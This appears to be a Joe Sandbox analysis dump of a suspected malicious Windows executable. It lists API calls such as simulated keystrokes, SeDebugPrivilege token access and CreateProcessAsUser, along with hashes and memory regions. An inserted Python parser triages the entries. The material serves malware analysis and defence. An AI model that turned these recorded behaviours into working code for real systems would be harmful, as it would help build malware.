                                                                                                                                    • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                                    • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                    • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 181713994-0
                                                                                                                                    • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                    • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                    • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                    • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wfsopen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                    • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                    • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                    • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                    • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                    • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                    • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                    • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 03F94301
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                    • Instruction ID: b4e532700632bdb49fa45e174cc4c33f5e0af1b905f345bb4fc6df968b0cc3e4
                                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                    • Instruction Fuzzy Hash: B1E09A7494010DAFDB10EFB8D54969E7BB4EF04301F1005A1FD0596681DA309A549A62
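The entries above are easier to work with as records than as a flat listing. The following parser is an added example and is not part of the Joe Sandbox report or its tooling: it turns the per-function blocks ("APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity") into structured objects and then flags two things an analyst checks first, calls that execute from a dump region not backed by a PE image (here the 03F92000 region, where the Sleep call lives) and fixed Sleep delays. The line grammar is inferred only from the lines visible on this page; any field layout beyond that is an assumption, and the sample text is constructed from entries copied from the page.

```python
"""Parse Joe Sandbox per-function entries into records (added example, not
Joe Sandbox code). Grammar inferred from the entries on this page only:
'APIs' header, bullets 'Name.MODULE(arg,...), ref: ADDR' (optionally
prefixed 'Part of subcall function ADDR:'), then 'Memory Dump Source',
'Joe Sandbox IDA Plugin' and 'Similarity' key/value bullets. Assumption."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

API_CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
SOURCE_RE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]{8}), based on PE: (?P<pe>true|false)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]                   # raw tokens; '?' means the sandbox could not resolve it
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set when the call is inside a subroutine of the function


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    source_file: Optional[str] = None
    offset: Optional[int] = None
    based_on_pe: Optional[bool] = None  # False: dump region is not a mapped PE image
    associated: list[str] = field(default_factory=list)
    snapshot: Optional[str] = None
    similarity: dict[str, str] = field(default_factory=dict)

    @property
    def api_id(self) -> str:
        return self.similarity.get("API ID", "")


def parse_entries(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per 'APIs' header; bullets are routed by the current section."""
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(FunctionEntry())
            section = line
        elif line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
        elif line.startswith("•") and entries:
            body = line[1:].strip()
            entry = entries[-1]
            if section == "APIs":
                m = API_CALL_RE.match(body)
                if not m:
                    raise ValueError(f"unrecognised API line: {body!r}")
                entry.calls.append(ApiCall(
                    m["name"], m["module"], m["args"].split(",") if m["args"] else [],
                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
            elif section == "Memory Dump Source":
                m = SOURCE_RE.match(body)
                if m:
                    entry.source_file, entry.offset = m["file"], int(m["off"], 16)
                    entry.based_on_pe = m["pe"] == "true"
                elif body.startswith("Associated: "):
                    entry.associated.append(body[len("Associated: "):])
            elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File: "):
                entry.snapshot = body[len("Snapshot File: "):]
            elif section == "Similarity":
                key, _, value = body.partition(":")
                entry.similarity[key.strip()] = value.strip()
    return entries


def triage(entries: list[FunctionEntry]) -> list[tuple[str, str]]:
    """Flag code outside any PE image (unpacked/injected stages) and fixed Sleep delays."""
    findings = []
    for e in entries:
        if e.based_on_pe is False:
            findings.append((e.api_id, f"code at {e.offset:08X} outside any PE image"))
        for c in e.calls:
            if c.name == "Sleep" and c.args and c.args[0] != "?":
                findings.append((e.api_id, f"Sleep({int(c.args[0], 16)} ms) at {c.ref:08X}"))
    return findings


# Constructed sample: two entries copied from this page (lines trimmed).
SAMPLE = """\
APIs
  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
• WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
APIs
• Sleep.KERNELBASE(000001F4), ref: 03F94301
Memory Dump Source
• Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
Similarity
• API ID: Sleep
"""

if __name__ == "__main__":
    for api_id, note in triage(parse_entries(SAMPLE)):
        print(f"{api_id:20} {note}")
```

Feed it the full report text (with the indentation the page carries, which `strip()` removes) and group the resulting entries by `api_id` or by `source_file` to see which API combinations sit in the image at 00400000 and which in the non-image region.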
APIs
• Sleep.KERNELBASE(000001F4), ref: 03F94301
Memory Dump Source
• Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 1567bb68ca674b26071011dce8f831a48fc5ba781daa3a0bf7284f29a304990c
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction Fuzzy Hash: 6AE0E67494010DDFDB00EFF8D54969E7FB4EF04301F1001A1FD01D2281D6309D509A62
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
• DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
• GetKeyState.USER32(00000011), ref: 0047C1A4
• GetKeyState.USER32(00000009), ref: 0047C1AD
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
• GetKeyState.USER32(00000010), ref: 0047C1CA
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
• SendMessageW.USER32 ref: 0047C2FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$State$LongProcWindow
• String ID: @GUI_DRAGID$F
• API String ID: 1562745308-4164748364
• Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
• Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
• Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
• Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
• API String ID: 0-3772701627
• Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
• Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
• Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
• Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
APIs
• GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
• IsIconic.USER32(?), ref: 004375E1
• ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
• SetForegroundWindow.USER32(?), ref: 004375FD
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
• GetCurrentThreadId.KERNEL32 ref: 00437619
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
• SetForegroundWindow.USER32(?), ref: 00437645
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
• keybd_event.USER32(00000012,00000000), ref: 0043765D
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
• keybd_event.USER32(00000012,00000000), ref: 00437674
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
• keybd_event.USER32(00000012,00000000), ref: 0043768B
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
• keybd_event.USER32(00000012,00000000), ref: 004376A2
• SetForegroundWindow.USER32(?), ref: 004376AD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 3778422247-2988720461
• Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
• Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
• Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
• Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
APIs
• _memset.LIBCMT ref: 0044621B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
• GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
• SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
• _wcslen.LIBCMT ref: 0044639E
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• _wcsncpy.LIBCMT ref: 004463C7
• LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
• CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
• UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
• CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
• CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
• SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
• DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                    • API String ID: 2173856841-1027155976
                                                                                                                                    • Opcode ID: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                                                    • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                                    • Opcode Fuzzy Hash: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                                                    • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
• Opcode ID: d063c81b6d46c843951d1fcf39b71a3da1da6362537048d5aa5123afb1fc8170
• Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
• Opcode Fuzzy Hash: d063c81b6d46c843951d1fcf39b71a3da1da6362537048d5aa5123afb1fc8170
• Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• _wcscat.LIBCMT ref: 0044BD96
• _wcscat.LIBCMT ref: 0044BDBF
• __wsplitpath.LIBCMT ref: 0044BDEC
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• _wcscpy.LIBCMT ref: 0044BE73
• _wcscat.LIBCMT ref: 0044BE85
• _wcscat.LIBCMT ref: 0044BE97
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
• MoveFileW.KERNEL32(?,?), ref: 0044BEF5
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
• DeleteFileW.KERNEL32(?), ref: 0044BF17
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
• FindClose.KERNEL32(00000000), ref: 0044BF35
• MoveFileW.KERNEL32(?,?), ref: 0044BF51
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
• FindClose.KERNEL32(00000000), ref: 0044BF7E
Strings
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 2188072990-1173974218
• Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
• Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
• Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
• Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
• __swprintf.LIBCMT ref: 00434D91
• _wcslen.LIBCMT ref: 00434D9B
• _wcslen.LIBCMT ref: 00434DB0
• _wcslen.LIBCMT ref: 00434DC5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
• _memset.LIBCMT ref: 00434E27
• _wcslen.LIBCMT ref: 00434E3C
• _wcsncpy.LIBCMT ref: 00434E6F
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
• CloseHandle.KERNEL32(00000000), ref: 00434EB4
• RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
• CloseHandle.KERNEL32(00000000), ref: 00434ECE
Strings
Similarity
• API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 302090198-3457252023
• Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
• Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
• Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
• Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
APIs
  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
• GetLastError.KERNEL32 ref: 004644B4
• GetCurrentThread.KERNEL32 ref: 004644C8
• OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
• OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
Strings
Similarity
• API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
• String ID: SeDebugPrivilege
• API String ID: 1312810259-2896544425
• Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
• Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
• Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
• Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
• __wsplitpath.LIBCMT ref: 004038B2
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscpy.LIBCMT ref: 004038C7
• _wcscat.LIBCMT ref: 004038DC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
